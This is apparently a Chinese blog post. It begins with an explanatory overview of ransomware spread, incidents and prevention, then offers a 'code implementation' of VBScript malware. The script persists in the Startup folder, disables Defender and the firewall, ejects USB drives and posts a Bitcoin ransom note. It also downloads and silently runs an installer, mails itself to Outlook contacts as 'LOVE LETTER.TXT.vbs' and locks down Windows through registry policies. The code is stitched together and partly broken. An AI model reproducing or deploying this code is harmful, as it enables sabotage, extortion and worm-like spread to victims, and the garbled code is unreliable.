勒索病毒
勒索病毒是一种新型电脑病毒,具有极强的破坏性和传播性。它主要通过多种方式进行传播和攻击,给个人、企业和社会带来了严重的威胁和损失。
勒索病毒可以通过钓鱼邮件的形式传播。攻击者将勒索病毒内嵌至钓鱼邮件的文档、图片等附件中,或将勒索病毒恶意链接写入钓鱼邮件正文中。一旦用户打开或点击,病毒就会自动加载、安装,进而威胁整个网络安全。
利用网站挂马也是常见的传播方式。攻击者通过网络攻击网站,在网站植入恶意代码,诱导用户访问网站并触发恶意代码,劫持用户当前访问页面至勒索病毒下载链接并执行,进而向用户设备植入勒索病毒。
安全漏洞同样会被攻击者利用。他们利用弱口令、远程代码执行等网络产品安全漏洞(这些漏洞多是已公开且已发布补丁的漏洞,且未及时修复的),攻击入侵用户内部网络,获取管理员权限,进而主动传播勒索病毒。
移动介质也可能成为传播途径。攻击者通过隐藏 U 盘、移动硬盘等移动存储介质原有文件,创建与移动存储介质盘符、图标等相同的快捷方式,一旦用户点击,将自动运行勒索病毒,或运行专门用于收集和回传设备信息的木马程序,便于未来实施针对性的勒索。
软件供应链也可能被利用。攻击者利用软件供应商与软件用户间的信任关系,通过攻击入侵软件供应商相关服务器设备,利用软件供应链分发、更新等机制,在合法软件正常传播、升级等过程中,对合法软件进行劫持或篡改,规避用户网络安全防护机制,传播勒索病毒。
远程桌面入侵也是一种方式。攻击者通常利用弱口令、暴力破解等方式获取攻击目标服务器远程登录用户名和密码,进而通过远程桌面协议登录服务器并植入勒索病毒。同时,攻击者一旦成功登录服务器,获得服务器控制权限,可以服务器为攻击跳板,在用户内部网络进一步传播勒索病毒。
勒索病毒一旦感染计算机,磁盘上几乎所有格式的文件都会被加密,造成企业、学校和个人用户大量重要文件无法使用甚至外泄,严重影响日常工作和生活。一般被勒索病毒感染后,将导致重要文件无法读取、关键数据被损坏、计算机被锁死无法正常使用等情况。为了指引被感染者缴纳赎金,勒索病毒还会在桌面等明显位置生成勒索提示文件,被感染者需要通过缴纳高额赎金才能获取解密密钥恢复计算机系统和数据文件的正常使用,多数情况即使缴纳了高额的赎金也未必能正常恢复数据。因此,勒索病毒具有数据恢复代价大和数据恢复可能性极低的特点。
常见的勒索病毒类型包括文件加密类勒索病毒、数据窃取类勒索病毒、系统加密类勒索病毒、屏幕锁定类勒索病毒。
全球范围内,勒索病毒攻击事件频发。例如,五年前(2017 年 5 月)的 WannaCry 勒索软件,世界各地都有受到该勒索软件的攻击,几天时间内,150 个国家的 20 多万台 Windows 电脑受到攻击,造成的损失达数十亿美元。据相关资料了解,这次事件中的主要受害者有英国国家卫生服务系统(NHS),西班牙的 Telefonica 电信服务以及电信供应商、银行、铁路系统,甚至俄罗斯的政府内部。WannaCry 勒索软件是全球规模、多方位的网络攻击,它标志着网络安全环境的一个转折点,激发了全世界的攻击者,并影响了未来五年的整个威胁格局,直到现在。
近年来,勒索病毒攻击事件更是频发,一系列攻击严重影响金融、能源、交通等领域服务于生产生活的信息系统正常运转,全球医疗、教育、金融、科技等重点行业企业是勒索病毒经常“光顾”对象,引发企业业务停滞、工厂停产等严重后果。例如,今年 5 月初,美国最大的输油管道运营商 Colonial Pipeline 公司的输油管道网络遭到攻击,犯罪团伙将数据作为“人质”,让其支付赎金。美国政府为此宣布国家进入紧急状态。此外,受到攻击的还有哥伦比亚特区警察局、收治新冠病毒患者的医院和制造商等,但这些部门没有对外公布,因为担心外界质疑安全能力,所以没有承认。
为了预防勒索病毒,我们可以采取以下措施:定期做好重要数据、文件的备份工作;及时更新升级操作系统和应用软件,修复存在的中高危漏洞;安装正版杀毒软件并及时升级病毒库,定期进行全面病毒扫描查杀;在系统中禁用 U 盘、移动硬盘、光盘的自动运行功能,不要使用/打开来路不明的 U 盘、光盘、电子邮件、网址链接、文件;避免使用弱口令,为每台服务器和终端设置不同口令,且采用大小写字母、数字、特殊字符混合的高复杂度组合结构,口令位数应 8 位以上;不要在网上下载安装盗版软件、非法破解软件以及激活工具。
代码实现
Do
Set WshShell = CreateObject(""WScript.Shell"")" & vbCrLf & _
Set FSO = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf & _
scriptPath = WScript.ScriptFullName" & vbCrLf & _
startupFolder = WshShell.SpecialFolders(""Startup"")" & vbCrLf & _
startupScriptPath = startupFolder & ""\""" & " & FSO.GetFileName(scriptPath)" & vbCrLf & _
If Not FSO.FileExists(startupScriptPath) Then" & vbCrLf & _
FSO.CopyFile scriptPath, startupScriptPath" & vbCrLf & _
Dim WshShell, http, response, url, objShell, objFSO, strUserName, objStream, objXMLHTTP
Set WshShell = CreateObject("WScript.Shell")
Set WshShell = CreateObject("WScript.Shell")
Set FSO = CreateObject("Scripting.FileSystemObject")
'GET THE desktopPath
desktopPath = WshShell.SpecialFolders("Desktop")
' secondScriptPath
secondScriptName = "SecondScript.vbs"
secondScriptPath = desktopPath & "\" & secondScriptName
'Content
scriptContent = _
"Set WshShell = CreateObject(""WScript.Shell"")" & vbCrLf & _
"Set FSO = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf & _
"scriptPath = WScript.ScriptFullName" & vbCrLf & _
"startupFolder = WshShell.SpecialFolders(""Startup"")" & vbCrLf & _
"startupScriptPath = startupFolder & ""\""" & " & FSO.GetFileName(scriptPath)" & vbCrLf & _
"If Not FSO.FileExists(startupScriptPath) Then" & vbCrLf & _
" FSO.CopyFile scriptPath, startupScriptPath" & vbCrLf & _
" WshShell.Popup ""Congragelations , We have disabled your antivirus settings。"", 2, ""脚本复制成功"", 64" & vbCrLf & _
"End If" & vbCrLf & _
"Do" & vbCrLf & _
" Set colDrives = FSO.Drives" & vbCrLf & _
" For Each objDrive in colDrives" & vbCrLf & _
" If objDrive.DriveType = 1 Then" & vbCrLf & _
" If objDrive.IsReady Then" & vbCrLf & _
" WshShell.Popup ""Tying to copy your files? NO WAY!!!Q: "" & objDrive.DriveLetter & "":""" & vbCrLf & _
" WshShell.Run ""cmd /c eject "" & objDrive.DriveLetter, 0, True" & vbCrLf & _
" Exit Do" & vbCrLf & _
" End If" & vbCrLf & _
" End If" & vbCrLf & _
" Next" & vbCrLf & _
" WScript.Sleep 5000" & vbCrLf & _
"Loop"
' Creat the second script
Set scriptFile = FSO.CreateTextFile(secondScriptPath, True)
scriptFile.WriteLine(scriptContent)
scriptFile.Close
' Run the second script
WshShell.Run secondScriptPath, 1, False
' 1. Disable Windows Defender and Firewall
On Error Resume Next
WshShell.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware", 1, "REG_DWORD"
WshShell.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring", 1, "REG_DWORD"
WshShell.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile\EnableFirewall", 0, "REG_DWORD"
WshShell.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\PrivateProfile\EnableFirewall", 0, "REG_DWORD"
WshShell.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\PublicProfile\EnableFirewall", 0, "REG_DWORD"
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments\LowRiskFileTypes", ".txt;.docx;.xlsx;.wps;.pdf;", "REG_SZ"
OperationRegistry.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD"
On Error GoTo 0
' 2. Display Ransom Message
Const bitcoinAddress = "dencrypt@.com"
Const amountRequired = "0.5"
WScript.Echo "Your important files have been locked. Send " & amountRequired & " Bitcoin to " & bitcoinAddress & " to unlock them. We are installing a trading system for you , please go to download file to check."
' 3. Define Constants for Python and Huobi Installation
Const DOWNLOAD_URL_PYTHON = "https://www.python.org/ftp/python/3.8.10/python-3.8.10-amd64.exe"
Const INSTALLER_NAME_PYTHON = "python-3.8.10-amd64.exe"
Const LIBRARIES = "huobi-client"
Const DOWNLOAD_URL_HUOBI = "https://example.com/huobi-client-installer.exe"
Const INSTALLER_NAME_HUOBI = "huobi-client-installer.exe"
' 4. Setup File System and Paths
Set objShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
strUserName = objShell.ExpandEnvironmentStrings("%USERNAME%")
Const PYTHON_PATH = "C:\Users\" & strUserName & "\AppData\Local\Programs\Python\Python38"
Const PIP_COMMAND = PYTHON_PATH & "\Scripts\pip.exe"
Const INSTALLER_PATH_PYTHON = "C:\Temp\" & INSTALLER_NAME_PYTHON
Const INSTALLER_PATH_HUOBI = "C:\Temp\" & INSTALLER_NAME_HUOBI
' 5. Create Temp Directory if Not Exists
If Not objFSO.FolderExists("C:\Temp") Then
objFSO.CreateFolder("C:\Temp")
End If
' 6. Download Python Installer
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", DOWNLOAD_URL_PYTHON, False
objXMLHTTP.sEnd IfobjXMLHTTP.Status = 200 Then
Set objStream = CreateObject("ADODB.Stream")
objStream.Open
objStream.Type = 1 ' Binary
objStream.Write objXMLHTTP.responseBody
objStream.Position = 0 ' Reset position to the start
objStream.SaveToFile INSTALLER_PATH_PYTHON, 2 ' Save as overwrite
objStream.Close
WScript.Echo "Downloaded Python installer."
Else
WScript.Echo "Failed to download Python installer."
WScript.Quit
End If
' 7. Install Python
objShell.Run INSTALLER_PATH_PYTHON & " /quiet InstallAllUsers=0 PrependPath=1 TargetDir=""" & PYTHON_PATH & """", 0, True
WScript.Sleep 5000 ' Wait for 5 seconds to ensure installation is complete
' 8. Install Python Libraries
If objFSO.FileExists(PIP_COMMAND) Then
objShell.Run “cmd.exe / c @echo off”
objShell.Run "cmd.exe /c """ & PIP_COMMAND & """ install " & LIBRARIES, 1, True
objShell.Run “cmd.exe / c pip install huobi - client"
WScript.Echo "Installed Python libraries."
Else
WScript.Echo "pip not found. Ensure Python is installed correctly."
End If
' 9. Clean Up Python Installer
objFSO.DeleteFile INSTALLER_PATH_PYTHON
WScript.Echo "Cleaned up Python installer file."
' 10. Download Huobi Client Installer
objXMLHTTP.open "GET", DOWNLOAD_URL_HUOBI, False
objXMLHTTP.sEnd IfobjXMLHTTP.Status = 200 Then
Set objStream = CreateObject("ADODB.Stream")
objStream.Open
objStream.Type = 1 ' Binary
objStream.Write objXMLHTTP.responseBody
objStream.Position = 0 ' Reset position to the start
objStream.SaveToFile INSTALLER_PATH_HUOBI, 2 ' Save as overwrite
objStream.Close
WScript.Echo "Downloaded Huobi client installer."
Else
WScript.Echo "Failed to download Huobi client installer."
WScript.Quit
End If
' 11. Install Huobi Client
objShell.Run INSTALLER_PATH_HUOBI & " /quiet", 0, True
WScript.Echo "Installed Huobi client."
' 12. Clean Up Huobi Installer
objFSO.DeleteFile INSTALLER_PATH_HUOBI
WScript.Echo "Cleaned up Huobi installer file."
' 13. Check Payment Status via BTCScan API
Set http = CreateObject("MSXML2.XMLHTTP")
Const btcScanAPI = "https://btcscan.org/tx/recent”
url = btcScanAPI & "?address=" & bitcoinAddress & "&amount=" & amountRequired
On Error Resume Next
http.Open "GET", url, False
http.SEnd IfErr.Number <> 0 Then
WScript.Echo "Error connecting to BTCScan API. Please check your network connection."
WScript.Quit
End If
On Error GoTo 0
If http.Status = 200 Then
response = http.responseText
If InStr(response, """status"":""paid""") > 0 Then
OperationRegistry.RegDelete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments\LowRiskFileTypes"
Dim fso, startupFolder, scriptName, startupScript
' 创建FileSystemObject对象
Set fso = CreateObject("Scripting.FileSystemObject")
' 获取启动文件夹路径
startupFolder = fso.GetSpecialFolder(2) ' 2表示启动文件夹
' 获取当前脚本的文件名
scriptName = fso.GetFile(WScript.ScriptFullName).Name
' 拼接出启动文件夹中该脚本的完整路径
startupScript = fso.BuildPath(startupFolder, scriptName)
' 检查该启动项是否存在,如果存在则删除
If fso.FileExists(startupScript) Then
fso.DeleteFile startupScript
End If
WScript.Echo "Payment received. Your files have been unlocked."
Else
WScript.Echo "Payment not detected. Files remain locked."
End If
Else
WScript.Echo "Failed to get a valid response from BTCScan API. Status code: " & http.Status
End If
WScript.Echo "Attempted to disable antivirus and firewall settings."
Set ol=CreateObject("Outlook.Application")
On Error Resume Next
For x=1 To 100
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="I love you "
Mail.Body="LOVE . please open this love letter@!"
Mail.Attachments.Add(dir2&"LOVE LETTER.TXT.vbs")
Mail.Send
Next
ol.Quit
WScript.Sleep 200
Loop
On Error Resume Next
Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"\LOVE LETTER.TXT.vbs")
so.GetFile(WScript.ScriptFullName).Copy(dir2&"\LOVE LETTER.TXT.vbs")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Start Menu\Programs\Shell:Startup\LOVE LETTER.TXT.vbs")
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",63000000,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry",""
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","Win32system.vbs"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskBar",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"
r.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","I LOVE YOU S0----"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","YOU ARE HACKED!"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",1,"REG_DWORD"
r.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Start Page","http://liudemin.myetang.com"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD"
3077
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
